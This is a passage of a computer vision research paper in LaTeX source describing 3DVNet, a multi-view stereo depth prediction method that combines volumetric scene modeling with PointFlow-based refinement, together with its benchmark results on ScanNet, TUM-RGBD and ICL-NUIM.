\caption{Volumetric methods lack local detail while depth-based methods lack global coherence. Our method cyclically predicts depth, back-projects into 3D space, volumetrically models geometry, and updates all depth predictions to match, resulting in local detail \textit{and} global coherence.}
\label{fig:diffs}
\end{small}
\end{figure}
\blfootnote{\url{https://github.com/alexrich021/3dvnet}}Multi-view stereo (MVS) is a central problem in computer vision with applications from augmented reality to autonomous navigation.
In MVS, the goal is to reconstruct a scene using only posed RGB images as input.
This reconstruction can take many forms, from voxelized occupancy or truncated signed distance fields (TSDFs), to per-frame depth prediction, the focus of this paper.
In recent years, MVS methods based on deep learning \cite{chen2019ptmvs, duzceker2020dvmvs, hou2019gpmvs, im2019dps, luo2019pmvs, murez2020atlas, sinha2020deltas, sun2021neucon, mvdepthnet, yao2018mvs, yao2019rmvs, yi2020pyramid, yu2020fmvs} have surpassed traditional MVS methods \cite{galliani2015gaupuma, schoenberger2016mvs} on numerous benchmark datasets \cite{dai2017scannet, jensen2014large, knapitsch2017tanks}.
In this work, we consider these methods as falling into two categories, depth estimation and volumetric reconstruction, each with advantages and disadvantages.
The most recent learning methods in depth estimation use deep features to perform dense multi-view matching robust to large environmental lighting changes and textureless or specular surfaces, among other things.
These methods take advantage of well researched multi-view aggregation techniques and the flexibility of depth as an output modality.
They formulate explicit multi-view matching costs and include iterative refinement layers in which a network predicts a small depth offset between an initial prediction and the ground truth depth map \cite{chen2019ptmvs, yu2020fmvs}.
While these techniques have been successful for depth prediction, most are constrained to making independent, per-frame predictions.
This results in predictions that do not agree on the underlying 3D geometry of the scene.
Those that do make joint predictions across multiple frames use either regularization constraints \cite{hou2019gpmvs} or recurrent neural networks (RNNs) \cite{duzceker2020dvmvs} to encourage frames close in pose space to make similar predictions.
However, these methods do not directly operate on a unified 3D scene representation, and their resulting reconstructions lack global coherence (see Fig.~\ref{fig:diffs}).
Meanwhile, volumetric techniques operate directly on a unified 3D scene representation by back-projecting and aggregating 2D features into a 3D voxel grid and using a 3D convolutional neural network (CNN) to regress a voxelized parameter, often a TSDF.
These methods benefit from the use of 3D CNNs and naturally produce highly coherent 3D reconstructions and accurate depth predictions.
However, they do not explicitly formulate a multi-view matching cost like depth-based methods, generally averaging deep features from different views to populate the 3D voxel grid.
This results in overly-smooth output meshes (see Fig.~\ref{fig:diffs}).
In this paper, we propose \textit{3DVNet}, an end-to-end differentiable method for learned multi-view depth prediction that leverages the advantages of both volumetric scene modeling and depth-based multi-view matching and refinement.
The key idea behind our method is the use of a 3D scene-modeling network which outputs a multi-scale volumetric encoding of the scene.
This encoding is used with a modified PointFlow algorithm \cite{chen2019ptmvs} to iteratively update a set of initial coarse depth predictions, resulting in predictions that agree on the underlying scene geometry.
Our 3D network operates on all depth predictions at once, and extracts meaningful, scene-level priors similar to volumetric MVS methods.
However, the 3D network operates on features aggregated using depth-based multi-view matching and can be used iteratively to update depth maps.
In this way, we combine the advantages of the two separate classes of techniques.
Because of this, 3DVNet exceeds state-of-the-art results on ScanNet \cite{dai2017scannet} in nearly all depth map prediction \textit{and} 3D reconstruction metrics when compared with the current best depth and volumetric baselines.
Furthermore, we show our method generalizes to other real and synthetic datasets \cite{handa2014icl-nuim, sturm2012tum-rgbd}, again exceeding the best results on nearly all metrics.
Our contributions are as follows:
\begin{enumerate}
\item We present a 3D scene-modeling network which outputs a volumetric scene encoding, and show its effectiveness for iterative depth residual prediction.
\item We modify PointFlow~\cite{chen2019ptmvs}, an existing method for depth map residual predictions, to use our volumetric scene encoding.
\item We design 3DVNet, a full MVS pipeline, using our 3D scene-modeling network and PointFlow refinement.
\end{enumerate}
\section{Related Works}
We cover MVS methods using deep learning, categorizing them as either depth-prediction methods or volumetric methods.
Our method falls into the first category, but is very much inspired by volumetric techniques.
\textbf{Depth-Prediction MVS Methods:} With some notable exceptions \cite{sinha2020deltas, yang2021mvs2d}, nearly all depth-prediction methods follow a similar paradigm: (1) they construct a plane sweep cost volume on a reference image's camera frustum, (2) they fill the volume with deep features using a cost function that operates on source and reference image features, (3)~they use a network to predict depth from this cost volume.
Most methods differ in their cost metric used to construct the volume.
Many cost metrics exist, including per-channel variance of deep features \cite{yao2018mvs, yao2019rmvs}, learned aggregation using a network \cite{luo2019pmvs, yi2020pyramid}, concatenation of deep features \cite{im2019dps}, the dot product of deep features \cite{duzceker2020dvmvs}, and absolute intensity difference of raw image RGB values \cite{hou2019gpmvs, mvdepthnet}.
We find per-channel variance \cite{yao2018mvs} to be the most commonly used cost metric, and adopt it in our system.
The choice of cost aggregation method results in either a vectorized matching cost and thus a 4D cost volume \cite{chen2019ptmvs, im2019dps, luo2019pmvs, yao2018mvs, yao2019rmvs, yi2020pyramid, yu2020fmvs} or a scalar matching cost and thus a 3D cost volume \cite{duzceker2020dvmvs, hou2019gpmvs, mvdepthnet}.
Methods with 4D cost volumes generally require 3D networks for processing, while 3D cost volumes can be processed with a 2D U-Net-style \cite{ronneberger2015unet} encoder-decoder architecture.
Some methods operate on the deep features at the bottleneck of this U-Net to make joint depth predictions for all $N$ frames or a subset of frames in a given scene.
This is similar to our proposed method, and we highlight the differences.
GPMVS \cite{hou2019gpmvs} uses a Gaussian Process (GP) constraint conditioned on pose distance to regularize these deep features.
This GP constraint only operates on deep features and assumes Gaussian priors.
In contrast, we directly \textit{learn} priors from predicted depth maps and explicitly predict depth residuals to modify depth maps to match.
DV-MVS \cite{duzceker2020dvmvs} introduces an RNN to propagate information from the deep features in frame $t - 1$ to frame $t$ given an ordered sequence of frames.
While they do propagate this information in a geometrically plausible way, the RNN operates only on deep features similar to GPMVS.
Furthermore, the RNN never considers all frames jointly like our method.
Similar to our method, some networks iteratively predict a residual to refine an initial depth prediction \cite{chen2019ptmvs, yu2020fmvs}.
We specifically highlight Point-MVSNet \cite{chen2019ptmvs}, which introduces PointFlow, a point cloud learning method for residual prediction.
Our method is very much inspired by this work. We briefly describe the differences.
In their work, they operate on a point cloud back-projected from a \textit{single} depth map and augmented with additional points.
Features are extracted from this point cloud using point cloud learning techniques and used in their PointFlow module for residual prediction.
Crucially, these features do not come from a unified 3D representation of the scene.
Thus the residual prediction is only conditioned on information local to the individual depth prediction and not global scene information.
In contrast, our variation of PointFlow uses our volumetric scene model to condition residual prediction on information from \textit{all} depth maps.
For an in depth discussion of differences, see Sec.~\ref{sec:refinement}.
\textbf{Volumetric MVS Methods:} In volumetric MVS, the goal is to directly regress a global volumetric representation of the scene, generally a TSDF volume.
We highlight two methods which inspired our work.
Atlas \cite{murez2020atlas} back-projects rays of deep features extracted from images into a global voxel grid, pools features from multiple views using a running average, then directly regress a TSDF in a coarse-to-fine fashion using a 3D U-Net.
NeuralRecon~\cite{sun2021neucon} improves on the memory consumption and run-time of Atlas by reconstructing local fragments using the most recent keyframes, then fusing the local fragments to a global volume using an RNN.
The reconstructions these methods produce are pleasing.
However, both construct feature volumes using averaging in a single forward pass, which we believe is non-optimal.
In contrast, our depth-based method allows us to construct a feature volume using multi-view matching features and perform iterative refinement.
\begin{figure*}[h]
\begin{center}
\includegraphics[width=0.9\linewidth]{figures/3D_refinement.jpg}
\end{center}
\vspace{-0.6cm}
\caption{Our novel 3D scene modeling and refinement method first constructs a multi-scale volumetric scene encoding from a set of $N$ input depth maps with corresponding feature maps. It then uses that encoding in a variation of the PointFlow algorithm~\cite{chen2019ptmvs} to predict a residual for each of the $N$ depth maps. The full method can be run in a nested for-loop fashion, predicting multiple residuals per depth map in the inner loop and running scene modeling in the outer loop.}
\label{fig:main}
\end{figure*}
\section{Methods}
Our method takes as input $N$ images, denoted $\{\vect{I}_n\}$, $n=1, \dots, N$ with corresponding known extrinsic and intrinsic camera parameters.
Our goal is to predict $N$ depth maps $\{\vect{D}_n\}$ corresponding to the $N$ images.
As a pre-processing step, we define for every image $\vect{I}_n$ a set of $M$ indices $\{s_1, \dots, s_M\}$ pointing to which images to use as source images for depth prediction,
and append the reference index to form the set $\vect{S}_n = \{n, s_1, \dots, s_M\}$.
Our pipeline is as follows.
First, a small depth-prediction network is used to independently predict initial coarse depth maps $\{\vect{D}_n^0\}$ for every frame $\{\vect{I}_n\}$ using extracted image features $\{\vect{F}_n\}$ (Sec.~\ref{sec:3dvnet}).
Second, we back-project our $N$ initial depth maps to form a joint point cloud \mbox{$\vect{X} \subset \mathbb{R}^3$} (Sec~\ref{sec:3d-network}).
Because each point $\vect{p} \in \vect{X}$ is associated with one depth map $\vect{D}_n^{0}$ that has associated feature maps \mbox{$\{\vect{F}_s : s \in \vect{S}_n\}$}, we can augment it with a multi-view matching feature aggregated from those feature maps.
Third, our 3D scene-modeling network takes as input this feature-rich point cloud and outputs a multi-scale scene encoding $\vect{V}_1, \vect{V}_2, \vect{V}_3$ (Sec.~\ref{sec:3d-network}).
Fourth, we update each depth map to match this scene encoding using a modified PointFlow algorithm, resulting in highly coherent depth maps and thus highly coherent reconstructions (Sec.~\ref{sec:refinement}).
Steps 2-4 can be run in a nested for-loop, with steps 2 and 3 run in the outer loop to generate updated scene models with the current depth maps and step 4 run in the inner loop to refine depth maps with the current scene model.
We denote the updated depth map after $l_o$ outer loop iterations of scene modeling and $l_i$ inner loop iterations of updating as $\vect{D}_n^{(l_o, l_i)}$.
Finally, we upsample the resulting refined depth maps to the size of the original image in a coarse-to-fine manner, guided by deep features and the original image, to arrive at final predictions $\{\vect{D}_n\}$ for every image $\{\vect{I}_n\}$ (Sec.~\ref{sec:3dvnet}).
\subsection{3D Scene Modeling} \label{sec:3d-network}
A visualization of our 3D scene modeling method is given in the upper half of Fig.~\ref{fig:main}.
As stated previously, our 3D scene-modeling network operates on a feature rich point cloud back-projected from $\{\vect{D}_n^0\}$ or subsequent updated depth maps.
To process this point cloud, we adopt a voxelize-then-extract approach.
We first generate a sparse 3D grid of voxels, culling voxels that do not contain depth points.
To avoid losing granular information of the point cloud, we generate a deep feature for each voxel using a per-voxel PointNet \cite{qi2017pointnet}.
The PointNet inputs are the features of each depth point in the voxel as well as the 3D offset of that point to the voxel center.
Finally, we run a 3D U-Net~\cite{ronneberger2015unet} on the resulting voxelized feature volume and extract intermediate outputs at multiple resolutions.
By nature of construction, this U-Net learns meaningful, scene-level priors.
The result is a multi-scale, volumetric scene encoding.
\textbf{Point Cloud Formation:} We form our point cloud $\vect{X}~\subset~\mathbb{R}^3$ by back-projecting all depth pixels in all $N$ depth maps.
For our multi-view matching feature associated with each point $\vect{p} \in \vect{X}$, we follow existing work \cite{chen2019ptmvs, yao2018mvs} and use per-channel variance aggregation using the reference and source feature maps associated with each depth pixel.
For $\vect{p}~\in~\vect{X}$, given that $\vect{p}$ belongs to depth map $\vect{D}_n^0$, the equation for variance feature $\boldsymbol{\sigma}^2(\vect{p})$, applied per-channel, is:
\begin{equation}\label{eq:var}
\boldsymbol{\sigma}^2(\vect{p}) = \frac{1}{|\vect{S}_n|}\sum_{s \in \vect{S}_n} \left(\vect{F}_{s}(\vect{\hat{p}}_s) - \overline{\vect{F}_{*}(\vect{\hat{p}}_*)}\right)^2
\end{equation}
where $\vect{\hat{p}}_s$ is the projection of $\vect{p}$ to feature map $\vect{F}_s$, $\vect{F}_s(\vect{\hat{p}}_s)$ is the bilinear interpolation of $\vect{F}_s$ to point $\vect{\hat{p}}_s$, and $\overline{\vect{F}_{*}(\vect{\hat{p}}_*)}$ is the average interpolated feature over all indices $s \in \vect{S}_n$.
Intuitively, if $\vect{p}$ lies on a surface it is more likely to have low variance in most feature channels in $\boldsymbol{\sigma}^2(\vect{p})$ while if it doesn't lie on a surface the variance will likely be high.
\textbf{Point Cloud Voxelization:} To form our initial feature volume, we regularly sample an initial 3D grid of points $\vect{C}$ every $r=8$ cm within the axis-aligned bounding box of point cloud $\vect{X}$ and define the voxel associated with each grid point $\vect{c} \in \vect{C}$ as the $8$ $\textrm{cm}^3$ cube with center $\vect{c}$.
We denote the set of depth points that fall within a voxel with center $\vect{c} \in \vect{C}$ as $v(\vect{c})~=~\{\vect{p} \in \vect{X}: ||\vect{c} - \vect{p}||_\infty <= \frac{r}{2} \}$.
We sparsify this grid by discarding $\vect{c} \in \vect{C}$ if no depth points lie within the associated voxel, denoting this set of grid coordinates as $\vect{\hat{C}} = \{ \vect{c} \in \vect{C} : v(\vect{c}) \neq \emptyset \}$.
For $\vect{c} \in \vect{\hat{C}}$, we produce a feature for the associated voxel using PointNet \cite{qi2017pointnet} with max pooling.
The PointNet feature for each voxel is defined as:
\begin{equation} \label{eq:pn}
\vect{f}_v(\vect{c}) = \underset{\vect{p} \in v(\vect{c})}{\triangle} h_{\theta}\left(\textrm{concat}\left[\vect{p} - \vect{c}, \boldsymbol{\sigma}^2(\vect{p})\right]\right)
\end{equation}
where $h_{\theta}$ is a learnable multi-layer perceptron (MLP), $\textrm{concat}\left[\vect{q}, \vect{f}\right]$ indicates concatenation of the 3D coordinates $\vect{q}$ with the feature channel of $\vect{f}$ to form a feature with 3 additional channels, and $\triangle$ is the channel-wise max pooling operation.
The result of this stage is a sparse feature volume $\vect{V}_0$ with features given by Eq.~\ref{eq:pn} and coordinates $\vect{\hat{C}}$.
\textbf{Multi-Scale 3D Feature Extraction:} In this stage, we use a sparse 3D U-Net to model the underlying scene geometry.
We use a basic U-Net architecture with skip connections.
Group normalization is used throughout.
See supplementary material for a more detailed description of our architecture.
Our sparse U-Net takes as input sparse feature volume $\vect{V}_0$.
From intermediate outputs of the U-Net, we extract three scales of feature volumes $\vect{V}_1$, $\vect{V}_2$, $\vect{V}_3$ with a voxel edge length of $4r = 32$ cm, $2r = 16$ cm, and $r = 8$ cm, respectively, describing the scene.
In this way, we extract a rich, multi-scale, volumetric encoding of the scene.
\begin{figure}[t]
\begin{center}
\includegraphics[width=\linewidth]{figures/sparse_interp.jpg}
\end{center}
\vspace{-0.6cm}
\caption{Diagram of standard PointFlow hypothesis point construction and our proposed feature generation, shown in 2D for simplicity. Feature volume in diagram corresponds to a single scale of our multi-scale scene encoding.
Our key change from the original formulation is to generate hypothesis point features by trilinear interpolation of our volumetric scene encoding rather than edge convolutions on the point cloud from a single back-projected depth map.
}
\label{fig:interp}
\end{figure}
\subsection{PointFlow-Based Refinement} \label{sec:refinement}
\begin{figure*}[t]
\begin{center}
\includegraphics[width=0.9\linewidth]{figures/3dvnet.png}
\end{center}
\vspace{-0.6cm}
\caption{Overview of the full 3DVNet pipeline. See Secs.~\ref{sec:3d-network} and \ref{sec:refinement} for a description of our scene modeling and refinement.}
\label{fig:3dvnet}
\end{figure*}
In this stage, we use our multi-scale scene encoding $\vect{V}_1, \vect{V}_2, \vect{V}_3$ from the previous stage in a variation of the PointFlow algorithm proposed by Chen \etal~\cite{chen2019ptmvs}.
The goal is to refine our predicted depth maps to match our scene model by predicting a residual for each depth pixel.
We briefly review the core components of PointFlow and the intuition behind our proposed change.
In PointFlow, a set of points called \textit{hypothesis points} are constructed at regular intervals along a depth ray, centered about the depth prediction associated with the given depth ray. The blue and red points in Fig.~\ref{fig:interp} illustrate this.
Features are generated for the hypothesis points.
Then, a network processes these features and outputs a probability score for every point indicating confidence the given point is at the correct depth.
Finally, the expected offset is calculated using these probabilities and added to the original depth prediction.
Our key innovation is the use of our multi-scale scene encoding to generate the hypothesis point features.
In the original PointFlow, hypothesis points are constructed for a \textit{single} depth map, augmented with features using Eq.~\ref{eq:var}, and aggregated into a point cloud.
Note this point cloud is strictly different from our point cloud as (1) it is produced using a \textit{single} depth map, and (2) it includes hypothesis points.
Features are generated for each point using edge convolutions \cite{dgcnn} on the k-Nearest-Neighbor (kNN) graph.
Crucially, these edge convolutions never operate on a unified 3D scene representation in the original PointFlow.
This prevents the offset predictions from learning global information, which we believe is a critical step for depth residual prediction.
Furthermore, because of the required kNN search, this formulation cannot scale to process a joint point cloud from an arbitrary number of depth maps, therefore preventing it from scaling to learn global information.
Inspired by convolutional occupancy networks \cite{peng2020conet} and IFNets \cite{chibane20ifnet}, we instead generate hypothesis features by interpolating each scale of our multi-scale scene encoding (see Fig.~\ref{fig:interp}).
With this key change, we use powerful scene-level priors in our offset prediction conditioned on all $N$ depth predictions for a given scene.
Furthermore, by using the same encoding to update all $N$ depth predictions, we encourage global consistency of predictions.
We now describe in detail our variation of the PointFlow method (see Figs.~\ref{fig:main} and~\ref{fig:interp}), using notation similar to the original paper.
\textbf{Hypothesis Point Construction:}
For a given back-projected depth pixel $\vect{{p}}$ from depth map $\vect{D}_n$, we generate $2h+1$ point hypotheses $\{\vect{\tilde{p}}_k\}$:
\begin{equation}
\vect{\tilde{p}}_k = \vect{p} + ks\vect{t}, \quad k = -h, \dots, h
\end{equation}
where $\vect{t}$ is the normalized reference camera direction of $\vect{D}_n$, and $s$ is the displacement step size.
\textbf{Feature Generation:} We generate a multi-scale feature for each hypothesis point $\vect{\tilde{p}}_k$ using trilinear interpolation to point $\vect{\tilde{p}}_k$ of our sparse features volumes $\vect{V}_1, \vect{V}_2, \vect{V}_3$, using $0$s where features are not defined:
\begin{equation}
\vect{f}_i(\vect{\tilde{p}}_k) = \textrm{sparse\_interp}(\vect{V}_i, \vect{\tilde{p}}_k), \quad i = 1, 2, 3
\end{equation}
Next, we generate a variance feature $\boldsymbol{\sigma}^2(\vect{\tilde{p}}_k)$ for hypothesis point $\vect{\tilde{p}}_k$ using Eq.~\ref{eq:var}.
The final feature for a hypothesis point is the channel-wise concatenation of these features:
\begin{equation} \label{eq:pf-feats}
\vect{f}_k(\vect{\tilde{p}}_k) = \textrm{concat}\left[ \vect{f}_1(\vect{\tilde{p}}_k), \vect{f}_2(\vect{\tilde{p}}_k), \vect{f}_3(\vect{\tilde{p}}_k), \boldsymbol{\sigma}^2(\vect{\tilde{p}}_k) \right]
\end{equation}
We stack our $2h+1$ point-hypothesis features to form a 2D feature $\vect{H} \in \mathbb{R}^{(2h+1)\times c}$, where $c$ is the sum of the dimensions of our variance and scene encoding features.
\textbf{Offset Prediction:} We apply a 4 layer 1D CNN followed by a softmax function to predict a probability scalar for each point-wise entry in $\vect{H}$.
The predicted displacement of point $\vect{p}$ is then as follows:
\begin{equation}
\Delta d_p = \mathbb{E}(ks) = \sum_{k=-h}^{h} ks \times \textrm{Prob}(\vect{\tilde{p}}_k)
\end{equation}
The updated depth for each depth map is the depth of point $\vect{p} + \vect{t}\Delta d_p$ with respect to the camera associated with $\vect{D}_n$.
\subsection{Bringing It All Together: 3DVNet} \label{sec:3dvnet}
In this section, we describe our full depth-prediction pipeline using our multi-scale volumetric scene modeling and PointFlow-based refinement, which we name 3DVNet
(see Fig.~\ref{fig:3dvnet}).
Our pipeline consists of (1) initial feature extraction and depth prediction, (2) scene modeling and refinement, and (3) upsampling of our refined depth map to the size of the original image.
The scene modeling and refinement is done in a nested for-loop fashion, extracting a scene model in the outer loop and iteratively refining the depth predictions using that scene model in the inner loop.
We fix the input image size of 3DVNet to $320 \times 256$.
\textbf{2D Feature Extraction:} For our 2D feature extraction, we adopt the approach of D\"uz\c{c}eker \etal~\cite{duzceker2020dvmvs}, and use a 32 channel feature pyramid network (FPN) \cite{lin2017fpn} constructed on a MnasNet \cite{tan2019mnas} backbone to extract coarse and fine resolution feature maps of size $80 \times 64$ and $160\times 128$ respectively.
For every image $\vect{I}_n$, we denote these $\vect{F}_n^c$ and $\vect{F}_n^f$.
\textbf{MVSNet Prediction:} For the coarse depth prediction of image $\vect{I}_n$, we use a small MVSNet \cite{yao2018mvs} using the reference and source coarse feature maps $\{\vect{F}^\textit{c}_s : s \in \vect{S}_n\}$ to predict an initial coarse depth $\vect{D}_n^0$.
Our cost volume is constructed using traditional plane sweep stereo with $L = 96$ depth hypotheses sampled uniformly at intervals of 5 cm starting at 50 cm.
Similar to Yu and Gao $\cite{yu2020fmvs}$, our predicted depth map is spatially sparse compared to feature map $\vect{F}^\textit{c}_n$.
We fix our coarse depth map prediction size to $56 \times 56$.
\textbf{Nested For-Loop Refinement:} We denote the updated depths after scene-modeling iteration $l_o$ and PointFlow iteration $l_i$ as $\{\vect{D}_n^{(l_o, l_i)}\}$.
We use initial depth predictions $\{\vect{D}_n^0\}$ and coarse feature maps $\{\vect{F}_n^\textit{c}\}$ to generate multi-scale scene encoding $\vect{V}_1$, $\vect{V}_2$, $\vect{V}_3$.
We then run PointFlow refinement three times with displacement step size $s = 5$ cm, $5$ cm, and $2.5$ cm and $h = 3$ to get updated depths $\{\vect{D}_n^{(1, 3)}\}$.
In early experiments, we found two iterations at $5$ cm to be helpful.
We re-generate our scene encoding using updated depths $\{\vect{D}_n^{(1, 3)}\}$ and coarse feature maps $\{\vect{F}_n^\textit{c}\}$.
We then run PointFlow three more times with step sizes $s = 5$~cm, $5$~cm, and $2.5$ cm and $h = 3$ to get updated depths $\{\vect{D}_n^{(2, 3)}\}$.
We find our depth maps converge at this point.
\textbf{Coarse-to-Fine Upsampling:} In this stage, we upsample each refined depth prediction $\vect{D}_n^{(2, 3)}$ to the size of image $\vect{I}_n$.
We find PointFlow refinement does not remove interpolation artifacts, as this generally requires predicting large offsets across depth boundaries.
We outline a simple, coarse-to-fine method for upsampling while removing artifacts.
See the right section of Fig.~\ref{fig:3dvnet}.
At each step, we upsample the current depth prediction using nearest-neighbor interpolation to the size of the next-largest feature map and concatenate, using the original image $\vect{I}_n$ in the final step.
We then pass the concatenated feature map and depth through a smoothing network.
We use a version of the propagation network proposed by Yu and Gao \cite{yu2020fmvs}.
For every pixel $\vect{p}$ in depth map $\vect{D}$, the smoothed depth $\vect{\tilde{D}}$ is a weighted sum of $\vect{D}$ in the $3\times 3$ neighborhood about $\vect{p}$:
\begin{equation}
\vect{\tilde{D}}(\vect{p}) = \sum_{\vect{q} \in [-1, 0, 1]^2} g_{\theta}\left(\vect{p},\vect{q}\right)\vect{D}(\vect{p} + \vect{q})
\end{equation}
where $g_{\theta}$ is a 4 layer CNN that takes as input the concatenated feature and depth map and outputs 9 weights for every pixel $\vect{p}$,
and $g_{\theta}\left(\vect{p},\vect{q}\right)$ indexes those weights for the pixel $\vect{p}$.
A softmax function is applied to the weights for normalization.
We apply this coarse-to-fine upsampling to every refined depth map $\{\vect{D}_n^{(2, 3)}\}$ to arrive at a final depth prediction $\{\vect{D}_n\}$ for every input image $\{\vect{I}_n\}$.
\section{Experiments}
\begin{table*}[ht]
\begin{small}
\begin{center}
\begin{tabular}{r c c c c c c c c|c c|c}
\thickhline
& \multirow{2}{*}{PMVS} & PMVS & \multirow{2}{*}{FMVS} & FMVS & DVMVS & DVMVS & \multirow{2}{*}{GPMVS} & GPMVS & \multirow{2}{*}{Atlas} & Neural- & \multirow{2}{*}{Ours} \\
& & (FT) & & (FT) & pair & fusion & & (FT) & & Recon & \\
\thickhline
\sc{\textbf{ScanNet}} & & & & & & & & & & & \\
Abs-rel $\downarrow$ & 0.389 & 0.085 & 0.274 & 0.084 & 0.069 & \underline{0.061} & 0.121 & 0.062 & 0.062 & 0.063 & \textbf{0.040} \\
Abs-diff $\downarrow$ & 0.668 & 0.168 & 0.444 & 0.165 & 0.142 & 0.127 & 0.214 & 0.124 & 0.116 & \underline{0.099} & \textbf{0.079} \\
Abs-inv $\downarrow$ & 0.148 & 0.048 & 0.145 & 0.050 & 0.044 & \underline{0.038} & 0.066 & 0.039 & 0.044 & 0.039 & \textbf{0.026} \\
Sq-rel $\downarrow$ & 0.798 & 0.046 & 0.463 & 0.045 & 0.026 & \underline{0.021} & 0.860 & 0.022 & 0.040 & 0.039 & \textbf{0.015} \\
RMSE $\downarrow$ & 1.051 & 0.267 & 0.776 & 0.267 & 0.220 & 0.200 & 0.339 & \underline{0.199} & 0.238 & 0.206 & \textbf{0.154} \\
$\delta < 1.25$ $\uparrow$ & 0.630 & 0.922 & 0.732 & 0.922 & 0.949 & \underline{0.963} & 0.890 & 0.960 & 0.935 & 0.948 & \textbf{0.975} \\
$\delta < 1.25^2$ $\uparrow$ & 0.768 & 0.981 & 0.857 & 0.979 & 0.989 & \textbf{0.992} & 0.971 & \textbf{0.992} & 0.971 & 0.976 & \textbf{0.992} \\
$\delta < 1.25^3$ $\uparrow$ & 0.859 & 0.994 & 0.915 & 0.993 & \underline{0.997} & \underline{0.997} & 0.990 & \textbf{0.998} & 0.985 & 0.989 & \underline{0.997} \\
\hline
\rowcolor{Gray}
Acc $\downarrow$ & 0.093 & \textbf{0.039} & 0.059 & \underline{0.043} & 0.059 & 0.067 & 0.077 & 0.057 & 0.078 & 0.058 & 0.051 \\
\rowcolor{Gray}
Comp $\downarrow$ & 0.303 & 0.256 & 0.184 & 0.212 & 0.145 & 0.128 & 0.150 & 0.111 & \underline{0.097} & 0.108 & \textbf{0.075} \\
\rowcolor{Gray}
Prec $\uparrow$ & 0.651 & \textbf{0.738} & 0.570 & 0.707 & 0.595 & 0.557 & 0.486 & 0.604 & 0.607 & 0.636 & \underline{0.715} \\
\rowcolor{Gray}
Rec $\uparrow$ & 0.317 & 0.433 & 0.486 & 0.454 & 0.489 & 0.504 & 0.453 & \underline{0.565} & 0.546 & 0.509 & \textbf{0.625} \\
\rowcolor{Gray}
F-score $\uparrow$ & 0.409 & 0.529 & 0.511 & 0.541 & 0.524 & 0.520 & 0.459 & \underline{0.574} & 0.573 & 0.564 & \textbf{0.665} \\
\thickhline
\sc{\textbf{TUM-RGBD}} & & & & & & & & & & & \\
Abs-rel $\downarrow$ & 0.318 & 0.111 & 0.273 & 0.113 & 0.117 & 0.095 & 0.102 & \underline{0.093} & 0.163 & 0.106 & \textbf{0.076} \\
Abs-diff $\downarrow$ & 0.642 & 0.275 & 0.573 & 0.281 & 0.339 & 0.273 & 0.243 & 0.239 & 0.404 & \textbf{0.167} & \underline{0.210} \\
$\delta < 1.25$ $\uparrow$ & 0.662 & 0.858 & 0.694 & 0.851 & 0.838 & 0.886 & 0.874 & 0.891 & 0.816 & \textbf{0.912} & \textbf{0.912} \\
\hline
\rowcolor{Gray}
F-score $\uparrow$ & 0.115 & 0.145 & 0.150 & 0.154 & 0.141 & 0.162 & 0.157 & \underline{0.170} & 0.129 & 0.117 & \textbf{0.181} \\
\thickhline
\sc{\textbf{ICL-NUIM}} & & & & & & & & & & & \\
Abs-rel $\downarrow$ & 0.614 & 0.107 & 0.303 & 0.095 & 0.106 & 0.114 & 0.107 & \underline{0.066} & 0.110 & 0.123 & \textbf{0.050} \\
Abs-diff $\downarrow$ & 1.469 & 0.262 & 0.707 & 0.245 & 0.278 & 0.322 & 0.290 & \underline{0.176} & 0.332 & 0.303 & \textbf{0.120} \\
$\delta < 1.25$ $\uparrow$ & 0.311 & 0.877 & 0.659 & 0.894 & 0.878 & 0.847 & 0.855 & \underline{0.965} & 0.833 & 0.709 & \textbf{0.980} \\
\hline
\rowcolor{Gray}
F-score $\uparrow$ & 0.064 & 0.144 & \underline{0.382} & 0.246 & 0.173 & 0.150 & 0.241 & 0.323 & 0.194 & 0.055 & \textbf{0.440} \\
\thickhline
\end{tabular}
\end{center}
\vspace{-0.6cm}
\caption{Metrics for three datasets (ScanNet, TUM-RGBD, and ICL-NUIM). Bold indicates best performing method, underline the second best. White rows indicate 2D depth metrics while gray rows indicate 3D metrics. Vertical lines separate depth-based methods, volumetric methods, and our method. ``FT" denotes method was finetuned on ScanNet. Our method outperforms all other baseline methods by a wide margin on most metrics.}
\label{tab:main-results}
\end{small}
\end{table*}
\subsection{Implementation and Training Details}
\textbf{Libraries:} Our model is implemented in PyTorch using PyTorch Lightning \cite{falcon2019pl} and PyTorch Geometric \cite{FeyLenssen2019pygeo}.
We use Minkowski Engine \cite{choy2019minkowski} as our sparse tensor library.
We use Open3D~\cite{Zhou2018o3d} for both visualization and evaluation.
\textbf{Training Parameters:} We train our network on a single NVIDIA RTX 3090 GPU.
Our network is trained end-to-end with a mini-batch size of 2.
Each mini-batch consists of 7 images for depth prediction.
For our loss function, we accumulate the average $L_1$ error between ground truth and predicted depth maps, appropriately downsampling the ground truth depth map to the correct resolution, for all predicted, refined, and upsampled depth map at every stage in our pipeline.
Additionally, we employ random geometric scale augmentation with a factor selected between $0.9$ to $1.1$ and random rotation about the gravitational axis.
We first train with the pre-trained MnasNet backbone frozen using the Adam optimizer \cite{kingma2017adam} with an initial learning rate of $10^{-3}$ which is divided by 10 every 100 epochs ($\sim$1.5k iterations), to convergence ($\sim$1.8k iterations).
We unfreeze the MnasNet backbone and finetune the entire network using Adam and an initial learning rate of $10^{-4}$ that is halved every 50 epochs to convergence ($\sim$1.8k iterations).
\subsection{Datasets, Baselines, Metrics, and Protocols}
\textbf{Datasets:} To train and validate our model, we use the ScanNet \cite{dai2017scannet} official training and validation splits.
For our main comparison experiment, we use the ScanNet official test set, which consists of 100 test scenes in a variety of indoor settings.
To evaluate the generalization ability of our model, we select 10 sequences from TUM-RGBD \cite{sturm2012tum-rgbd}, and 4 sequences from ICL-NUIM \cite{handa2014icl-nuim} for comparison.
\textbf{Baselines:} We compare our method to seven state of the art baselines: Point-MVSNet (PMVS) \cite{chen2019ptmvs}, Fast-MVSNet (FMVS) \cite{yu2020fmvs}, DeepVideoMVS pair/fusion networks (DVMVS pair/fusion) \cite{duzceker2020dvmvs}, GPMVS batched \cite{hou2019gpmvs}, Atlas \cite{murez2020atlas}, and NeuralRecon \cite{sun2021neucon}.
The first five baselines are depth-prediction methods while the last two are volumetric methods.
Of these, we consider GPMVS and Atlas the most relevant depth and volumetric methods respectively, as both use information from all frames simultaneously during inference.
We use the ScanNet training scenes to fintetune methods not trained on ScanNet~\cite{chen2019ptmvs, hou2019gpmvs, yu2020fmvs}.
We report both the finetuned and pretrained results, denoted with and without ``FT".
To account for range differences between the DTU dataset~\cite{jensen2014large} and ScanNet, we use our model's plane sweep parameters with PMVS and FMVS.
\textbf{Metrics:} We use the 2D and 3D metrics presented by Murez \etal~\cite{murez2020atlas} for evaluation.
See supplementary for definitions.
